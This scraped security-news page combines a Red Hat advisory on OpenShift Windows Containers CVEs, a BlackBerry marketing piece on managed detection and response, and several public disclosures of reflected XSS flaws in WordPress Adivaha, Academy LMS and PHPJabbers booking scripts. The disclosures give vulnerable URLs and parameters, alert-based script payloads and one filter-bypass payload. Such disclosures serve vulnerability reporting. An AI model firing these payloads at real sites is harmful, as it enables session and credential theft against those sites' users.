The components for Red Hat OpenShift support for Windows Containers 6.0.1 are now available. This product release includes bug fixes and security update for the following packages: windows-machine-config-operator and windows-machine-config-operator-bundle.
Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.

Related CVEs:
* CVE-2022-27191: A broken cryptographic algorithm flaw was found in golang.org/x/crypto/ssh. This issue causes a client to fail authentication with RSA keys to servers that reject signature algorithms based on SHA-2, enabling an attacker to crash the server, resulting in a loss of availability.
* CVE-2022-30629: A flaw was found in the crypto/tls golang package. When session tickets are generated by crypto/tls, it is missing the ticket expiration. This issue may allow an attacker to observe the TLS handshakes to correlate successive connections during session resumption.
* CVE-2023-25173: A flaw was found in containerd, where supplementary groups are not set up properly inside a container. If an attacker has direct access to a container and manipulates their supplementary group access, they may be able to use supplementary group access to bypass primary group restrictions in some cases. This issue can allow access to sensitive information or gain the ability to execute code in that container.


Skip to navigation Skip to main content

**Utilities**

*   Subscriptions
*   Downloads
*   Containers
*   Support Cases

**Infrastructure and Management**

*   Red Hat Enterprise Linux
*   Red Hat Satellite
*   Red Hat Subscription Management
*   Red Hat Insights
*   Red Hat Ansible Automation Platform

**Cloud Computing**

*   Red Hat OpenShift
*   Red Hat OpenStack Platform
*   Red Hat OpenShift Container Platform
*   Red Hat OpenShift Data Science
*   Red Hat OpenShift Dedicated
*   Red Hat Advanced Cluster Security for Kubernetes
*   Red Hat Advanced Cluster Management for Kubernetes
*   Red Hat Quay
*   Red Hat CodeReady Workspaces
*   Red Hat OpenShift Service on AWS

**Storage**

*   Red Hat Gluster Storage
*   Red Hat Hyperconverged Infrastructure
*   Red Hat Ceph Storage
*   Red Hat OpenShift Data Foundation

**Runtimes**

*   Red Hat Runtimes
*   Red Hat JBoss Enterprise Application Platform
*   Red Hat Data Grid
*   Red Hat JBoss Web Server
*   Red Hat Single Sign On
*   Red Hat support for Spring Boot
*   Red Hat build of Node.js
*   Red Hat build of Quarkus

**Integration and Automation**

All Products

Issued:

2023-08-07

Updated:

2023-08-07

**RHSA-2023:4488 - Security Advisory**

*   Overview
*   Updated Images

**Synopsis**

Moderate: Red Hat OpenShift support for Windows Containers 6.0.1\[security update\]

**Type/Severity**

Security Advisory: Moderate

**Topic**

The components for Red Hat OpenShift support for Windows Containers 6.0.1 are now available. This product release includes bug fixes and security update for the following packages: windows-machine-config-operator and windows-machine-config-operator-bundle.  

Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

**Description**

Red Hat OpenShift support for Windows Containers allows you to deploy Windows container workloads running on Windows Server containers.  

Security Fix(es):  

*   golang: crash in a golang.org/x/crypto/ssh server (CVE-2022-27191)
*   containerd: supplementary groups are not set up properly (CVE-2023-25173)
*   golang: crypto/tls: session tickets lack random ticket\_age\_add (CVE-2022-30629)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

**Solution**

Before applying this update, make sure all previously released errata  
relevant to your system have been applied.  

For details on how to apply this update, refer to:  

https://access.redhat.com/articles/11258

**Affected Products**

*   Red Hat OpenShift Container Platform 4.11 for RHEL 8 x86\_64

**Fixes**

*   BZ - 2064702 - CVE-2022-27191 golang: crash in a golang.org/x/crypto/ssh server
*   BZ - 2092793 - CVE-2022-30629 golang: crypto/tls: session tickets lack random ticket\_age\_add
*   BZ - 2174485 - CVE-2023-25173 containerd: Supplementary groups are not set up properly
*   WINC-823 - Test generated community manifests in WMCO e2e
*   WINC-818 - Investigate if the Upgradeable condition is being tested in e2e suite
*   OCPBUGS-3572 - Check if Windows defender is running doesnt work
*   OCPBUGS-4247 - Load balancer shows connectivity outage during Windows nodes upgrade
*   OCPBUGS-7726 - WMCO kubelet version not matching OCP payload's one
*   OCPBUGS-8055 - containerd version is being misreported
*   OCPBUGS-10418 - Case sensitivity issue when label "openshift.io/cluster-monitoring" set to 'True' on openshift-windows-machine-config-operator namespace
*   OCPBUGS-11831 - oc adm node-logs failing in vSphere CI
*   OCPBUGS-15435 - Instance configurations fails on Windows Server 2019 without the container feature
*   OCPBUGS-5894 - Windows nodes do not get drained (deconfigure) during the upgrade process

**CVEs**

*   CVE-2020-24736
*   CVE-2022-27191
*   CVE-2022-30629
*   CVE-2022-36227
*   CVE-2023-0361
*   CVE-2023-1667
*   CVE-2023-2283
*   CVE-2023-25173
*   CVE-2023-26604
*   CVE-2023-27535

**x86\_64**

openshift4-wincw/windows-machine-config-operator-bundle@sha256:cd4c5c5b0fa1691a48d2ac33a2794c89e8e60d804a6e36d42ccd868b90c5ac05

openshift4-wincw/windows-machine-config-rhel8-operator@sha256:0326010fe1acf466d43a363bf7285a814443c73a2be821cdd7465c0defa04401

The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/.

RHSA-2023:4488: Red Hat Security Advisory: Red Hat OpenShift support for Windows Containers 6.0.1[security update]

Managed Detection and Response (MDR) has emerged as a crucial solution for organizations looking to bolster their security measures. MDR allows businesses to outsource the management of Endpoint Detection and Response (EDR) products deployed across their network domain. With real-time threat-hunting capabilities, MDR services detect and mitigate malicious activities on individual endpoints while

Managed Detection and Response

**Managed Detection and Response (MDR)** has emerged as a crucial solution for organizations looking to bolster their security measures. MDR allows businesses to outsource the management of Endpoint Detection and Response (EDR) products deployed across their network domain. With real-time threat-hunting capabilities, MDR services detect and mitigate malicious activities on individual endpoints while promptly alerting the service provider's Security Operations Center (SOC) for further investigation. By leveraging the expertise of security specialists, MDR services relieve organizations of the complexities and criticality associated with security operations.

****Types of MDR Solutions:****

MDR services come in various forms, tailored to an organization's technology environment and risk requirements.

These include:

1.  **Bring-Your-Own Security Stack / Hybrid Solution:** MDR solutions that integrate with existing security products deployed within an environment.
2.  **Full Vendor-Supplied MDR Stack:** Standalone MDR platforms that operate independently.
3.  **Cloud MDR Solution:** MDR services delivered through a centrally managed, multi-tenant Cloud platform, providing log management, orchestration, real-time analytics, and a user interface (UI) dashboard.
4.  **Managed Extended Detection and Response (Managed XDR):** MDR solutions that extend beyond endpoint detection to include protection for email, Cloud services, DNS, IoT and medical devices, and Industrial Control Systems (ICS) and SCADA networks.
5.  **Custom MDR Solutions:** Tailored MDR offerings designed to meet the unique requirements of an organization.

****Components of an MDR Solution:****

EDR Agents:

*   Workstation Agents
*   Server Agents
*   Network Security Monitoring (NSM) Agents
*   Email Server Agents
*   DNS Server Agents
*   IoT / Medical Device Agents
*   ICS / SCADA Security Agents

****Key Considerations for an Effective MDR Solution:****

To assess the quality of an MDR solution, it is essential to evaluate associated EDR products and cybersecurity services separately.

Consider the following factors:

1.  **Malware Detection and Response**: An effective MDR solution should swiftly detect and respond to a wide range of threats, minimizing the dwell time of malware and preventing it from impacting the affected system.
2.  **Threat Detection Capabilities:** The ability to detect both known and unknown threats, coupled with the utilization of the latest threat intelligence, is crucial for an MDR solution's efficacy. Managed XDR solutions that offer extended capabilities should efficiently correlate security telemetry and orchestrate a comprehensive real-time response across the network.
3.  **Service Commitment:** Assess the MDR provider's commitment to delivering services, including round-the-clock support availability and the comprehensiveness of their service-level agreement (SLA). Additionally, consider the provider's reputation, scalability, and ability to leverage global cyber threat intelligence (CTI).
4.  **Customization and Remediation:** Evaluate whether the MDR provider offers tailored products and comprehensive threat remediation and mitigation services to address an organization's unique environment.

For more comprehensive insights into the cost of building versus buying an MDR solution and more, BlackBerry's **MDR buyers guide** provides a useful tool to help you through this journey.

****Selecting the Right MDR Provider****

Choosing the appropriate MDR provider requires a comprehensive analysis of an organization's risk requirements and operational technologies. Decision-makers should have a clear understanding of their network's critical assets, sensitive data, employed technologies, and the relevant threat landscape. This knowledge enables organizations to evaluate each MDR provider based on their product and service offerings.

To gain further insights into the performance of various Endpoint Security solutions, independent research reports like the MITRE Enginuity ATT&CK Evaluations publish performance benchmarks. These evaluations offer valuable information on how vendors' products perform against simulated attacks, aiding in the comparison of different solutions.

MDR has become an indispensable security solution, empowering organizations to proactively detect, respond, and mitigate threats across their network infrastructure. By carefully selecting the right MDR provider and solution, organizations can fortify their security posture and safeguard their critical assets from ever-evolving cyber threats.

Companies of all sizes must now contend with a growing number of devices, each one representing a new addition to their attack surfaces. And they must do so while balancing skill gaps and resource shortages, all while hoping they don't end up in an adversary's crosshairs. This is challenging enough for larger organizations, but for small and mid-sized businesses, it verges on impossible.

As a human-centric subscription-based 24x7x365 MDR service, **CylanceGUARD®** provides the expertise and support businesses need. Combining the comprehensive expertise embodied by **BlackBerry Cybersecurity Services** with AI-based Endpoint Protection (EPP). In short, it provides businesses with everything they need to contend with a modern threat landscape—no matter what that landscape throws at them.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

MDR: Empowering Organizations with Enhanced Security

WordPress Adivaha Travel plugin version 2.3 suffers from a cross site scripting vulnerability.

    # Exploit Title: WordPress adivaha Travel Plugin 2.3 - Reflected XSS# Exploit Author: CraCkEr# Date: 29/07/2023# Vendor: adivaha - Travel Tech Company# Vendor Homepage: https://www.adivaha.com/# Software Link: https://wordpress.org/plugins/adiaha-hotel/# Demo: https://www.adivaha.com/demo/adivaha-online/# Tested on: Windows 10 Pro# Impact: Manipulate the content of the site ## GreetingsThe_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka  CryptoJob (Twitter) twitter.com/0x0CryptoJob## DescriptionThe attacker can send to victim a link containing a malicious URL in an email or instant messagecan perform a wide variety of actions, such as stealing the victim's session token or login credentialsPath: /mobile-app/v3/GET parameter 'isMobile' is vulnerable to XSShttps://www.website/mobile-app/v3/?pid=77A89299&isMobile=[XSS]XSS Payload: clq95"><script>alert(1)</script>lb1ra[-] Done

WordPress Adivaha Travel 2.3 Cross Site Scripting

Academy LMS version 6.0 suffers from a cross site scripting vulnerability.

    # Exploit Title: Academy LMS 6.0 - Reflected XSS# Exploit Author: CraCkEr# Date: 22/07/2023# Vendor: Creativeitem# Vendor Homepage: https://creativeitem.com/# Software Link: https://demo.creativeitem.com/academy/# Tested on: Windows 10 Pro# Impact: Manipulate the content of the site # CVE: CVE-2023-4119## GreetingsThe_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka  CryptoJob (Twitter) twitter.com/0x0CryptoJob## DescriptionThe attacker can send to victim a link containing a malicious URL in an email or instant messagecan perform a wide variety of actions, such as stealing the victim's session token or login credentialsPath: /academy/home/coursesGET parameter 'query' is vulnerable to XSShttps://website/academy/home/courses?query=[XSS]Path: /academy/home/coursesGET parameter 'sort_by' is vulnerable to XSShttps://website/academy/home/courses?category=web-design&price=all&level=all&language=all&rating=all&sort_by=[XSS]XSS Payloads (Blocked) :<script>alert(1)</script>ldt4d"><ScRiPt>alert(1)</ScRiPt>nuyddXSS Payload Bypass Filter  : cplvz"><img src=a onerror=alert(1)>fk4ap[-] Done

Academy LMS 6.0 Cross Site Scripting

PHPJabbers Rental Property Booking version 2.0 suffers from a cross site scripting vulnerability.

    # Exploit Title: PHPJabbers Rental Property Booking 2.0 - Reflected XSS# Exploit Author: CraCkEr# Date: 22/07/2023# Vendor: PHPJabbers# Vendor Homepage: https://www.phpjabbers.com/# Software Link: https://www.phpjabbers.com/rental-property-booking-calendar/# Tested on: Windows 10 Pro# Impact: Manipulate the content of the site# CVE: CVE-2023-4117## GreetingsThe_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka  CryptoJob (Twitter) twitter.com/0x0CryptoJob## DescriptionThe attacker can send to victim a link containing a malicious URL in an email or instant messagecan perform a wide variety of actions, such as stealing the victim's session token or login credentialsPath: /index.phpGET parameter 'index' is vulnerable to RXSShttps://website/index.php?controller=pjFront&action=pjActionSearch&session_id=&locale=1&index=[XSS]&date=[-] Done

PHPJabbers Rental Property Booking 2.0 Cross Site Scripting

PHPJabbers Taxi Booking version 2.0 suffers from a cross site scripting vulnerability.

    # Exploit Title: PHPJabbers Taxi Booking 2.0 - Reflected XSS# Exploit Author: CraCkEr# Date: 22/07/2023# Vendor: PHPJabbers# Vendor Homepage: https://www.phpjabbers.com/# Software Link: https://www.phpjabbers.com/taxi-booking-script/# Tested on: Windows 10 Pro# Impact: Manipulate the content of the site# CVE: CVE-2023-4116## GreetingsThe_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka  CryptoJob (Twitter) twitter.com/0x0CryptoJob## DescriptionThe attacker can send to victim a link containing a malicious URL in an email or instant messagecan perform a wide variety of actions, such as stealing the victim's session token or login credentialsPath: /index.phpGET parameter 'index' is vulnerable to RXSShttps://website/index.php?controller=pjFrontPublic&action=pjActionSearch&locale=1&index=[XSS][-] Done

PHPJabbers Taxi Booking 2.0 Cross Site Scripting

PHPJabbers Cleaning Business version 1.0 suffers from a cross site scripting vulnerability.

    # Exploit Title: PHPJabbers Cleaning Business 1.0 - Reflected XSS# Exploit Author: CraCkEr# Date: 21/07/2023# Vendor: PHPJabbers# Vendor Homepage: https://www.phpjabbers.com/# Software Link: https://www.phpjabbers.com/cleaning-business-software/# Tested on: Windows 10 Pro# Impact: Manipulate the content of the site# CVE: CVE-2023-4115## GreetingsThe_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka  CryptoJob (Twitter) twitter.com/0x0CryptoJob## DescriptionThe attacker can send to victim a link containing a malicious URL in an email or instant messagecan perform a wide variety of actions, such as stealing the victim's session token or login credentialsPath: /index.phpGET parameter 'index' is vulnerable to RXSShttps://website/index.php?controller=pjFront&action=pjActionServices&locale=1&index=[XSS][-] Done

PHPJabbers Cleaning Business 1.0 Cross Site Scripting

PHPJabbers Night Club Booking version 1.0 suffers from a cross site scripting vulnerability.

    # Exploit Title: PHPJabbers Night Club Booking 1.0 - Reflected XSS# Exploit Author: CraCkEr# Date: 21/07/2023# Vendor: PHPJabbers# Vendor Homepage: https://www.phpjabbers.com/# Software Link: https://www.phpjabbers.com/night-club-booking-software/# Tested on: Windows 10 Pro# Impact: Manipulate the content of the site# CVE: CVE-2023-4114## GreetingsThe_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka  CryptoJob (Twitter) twitter.com/0x0CryptoJob## DescriptionThe attacker can send to victim a link containing a malicious URL in an email or instant messagecan perform a wide variety of actions, such as stealing the victim's session token or login credentialsPath: /index.phpGET parameter 'index' is vulnerable to RXSShttps://website/index.php?controller=pjFront&action=pjActionSearch&session_id=&locale=1&index=[XSS]&date=[-] Done

PHPJabbers Night Club Booking 1.0 Cross Site Scripting

PHPJabbers Service Booking Script version 1.0 suffers from a cross site scripting vulnerability.

    # Exploit Title: PHPJabbers Service Booking Script 1.0 - Reflected XSS# Exploit Author: CraCkEr# Date: 21/07/2023# Vendor: PHPJabbers# Vendor Homepage: https://www.phpjabbers.com/# Software Link: https://www.phpjabbers.com/service-booking-script/# Tested on: Windows 10 Pro# Impact: Manipulate the content of the site# CVE: CVE-2023-4113## GreetingsThe_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka  CryptoJob (Twitter) twitter.com/0x0CryptoJob## DescriptionThe attacker can send to victim a link containing a malicious URL in an email or instant messagecan perform a wide variety of actions, such as stealing the victim's session token or login credentialsPath: /index.phpGET parameter 'index' is vulnerable to RXSShttps://website/index.php?controller=pjFrontPublic&action=pjActionServices&locale=1&index=[XSS][-] Done

PHPJabbers Service Booking Script 1.0 Cross Site Scripting

PHPJabbers Shuttle Booking Software version 1.0 suffers from a cross site scripting vulnerability.

    # Exploit Title: PHPJabbers Shuttle Booking Software 1.0 - Reflected XSS# Exploit Author: CraCkEr# Date: 20/07/2023# Vendor: PHPJabbers# Vendor Homepage: https://www.phpjabbers.com/# Software Link: https://www.phpjabbers.com/shuttle-booking-software/# Tested on: Windows 10 Pro# Impact: Manipulate the content of the site# CVE: CVE-2023-4112## DescriptionThe attacker can send to victim a link containing a malicious URL in an email or instant messagecan perform a wide variety of actions, such as stealing the victim's session token or login credentialsPath: /index.phpURL parameter is vulnerable to RXSShttps://website/index.php/gm5rj"><script>alert(1)</script>bwude?controller=pjAdmin&action=pjActionLogin&err=1[-] Done

Tag

#ssh